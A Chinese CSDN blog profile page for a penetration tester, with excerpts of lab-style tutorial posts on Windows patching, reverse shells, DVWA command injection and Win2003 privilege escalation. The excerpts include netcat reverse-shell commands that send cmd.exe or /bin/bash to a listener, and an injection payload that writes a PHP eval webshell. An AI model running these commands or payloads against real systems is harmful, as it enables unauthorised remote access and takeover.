安服那些事儿
码龄5年
关注
提问 私信
  • 博客:2,521
    2,521
    总访问量
  • 5
    原创
  • 1,871,355
    排名
  • 7
    粉丝
  • 0
    铁粉

个人简介:渗透测试工程师希望多交流,谢谢关注

IP属地以运营商信息为准,境内显示到省(区、市),境外显示到国家(地区)
IP 属地:河北省
  • 加入CSDN时间: 2019-09-23
博客简介:

weixin_45676689的博客

查看详细资料
个人成就
  • 获得5次点赞
  • 内容获得2次评论
  • 获得8次收藏
创作历程
  • 1篇
    2020年
  • 4篇
    2019年
成就勋章
TA的专栏
  • 安全服务
    1篇
  • 渗透测试
    4篇
  • 1
兴趣领域 设置
  • 网络空间安全
    系统安全web安全
创作活动更多

仓颉编程语言体验有奖征文

仓颉编程语言官网已上线,提供版本下载、在线运行、文档体验等功能。为鼓励更多开发者探索仓颉编程语言,现诚邀各位开发者通过官网在线体验/下载使用,参与仓颉体验有奖征文活动。

368人参与 去创作
  • 最近
  • 文章
  • 代码仓
  • 资源
  • 问答
  • 帖子
  • 视频
  • 课程
  • 关注/订阅/互动
  • 收藏
搜TA的内容
搜索 取消

windos漏扫打补丁

** Windos 打补丁**通过各种漏洞扫描工具会得到一份报告打开其中一个举例这里需要注意的地方 记住这个操作系统(说明我们只打服务器的漏洞,各种服务,数据库的需要联系厂商,否则可能导致系统崩溃)一般只需要打中高级漏洞,这两种标识的需要阅读的东西 然后解决办法哪里一般会有补丁网址上面有系统版本下载相对应的一般都是64位版本下载到自己电脑然后找负责管理内网的人员要到他们连接内网的u盘,把补丁拷到u盘里,杀毒...
原创
发布博客 2020.09.18 ·
444 阅读 ·
1 点赞 ·
2 评论 ·
0 收藏

反弹shell

Nc在物理机开启1234端口并监听,在cmd输入:nc.exe -lvvp 1234在被攻击者(windows)电脑cmd中输入:nc.exe 192.168.31.201 1234 -e cmd.exe在物理机就可以看到反弹过来的shell,也能执行命令如果用linux反弹shell,输入:nc 192.168.31.201 1234 -e /bin/bash在物理机也能看...
原创
发布博客 2019.11.05 ·
286 阅读 ·
0 点赞 ·
0 评论 ·
0 收藏

渗透方面的相关知识

1、信息收集whois查网站源IP,子网站,管理员个人信息,邮箱,联系方式,社工库爆破,cms框架信息,服务器版本信息2、提权(判断系统win linux)首先判断是什么系统,win2008 cmd命令systeminfo查看版本及补丁信息利用ms15-051漏洞序列号提权工具win2003 cmd命令systeminfo查看版本及补丁信息利用ms09-012漏洞序列号提权工具linu...
原创
发布博客 2019.10.22 ·
603 阅读 ·
0 点赞 ·
0 评论 ·
3 收藏

渗透测试 命令注入(代码注入)Dvwa-low

在输入框输入:8.8.8.8 && echo “<?php @eval($_REQUEST[666])?>”>2.php将一句话木马写入到E:\phpstudy\PHPTutorial\WWW\DVWA-master\vulnerabilities\exec下,形成一个2.php文件运行结果在文件中查看2.php 看到写入成功用中国菜刀连接,添加地址连接成功...
原创
发布博客 2019.10.11 ·
632 阅读 ·
0 点赞 ·
0 评论 ·
3 收藏

win2003 提权

win2003 提权win2003 提权##实验环境Win2003+vmware15Win2003作为目标机,在物理机浏览器访问192.168.41.131,看是否能访问到iss下的文件##访问已经上传好了的大马,并登录进去##在大马中使用cmd命令,查看whoami,显示为低权限##使用systeminfo查看补丁信息##为了提权,在大马中向目标机的回收站中上传提权.exe软件...
原创
发布博客 2019.10.11 ·
554 阅读 ·
4 点赞 ·
0 评论 ·
2 收藏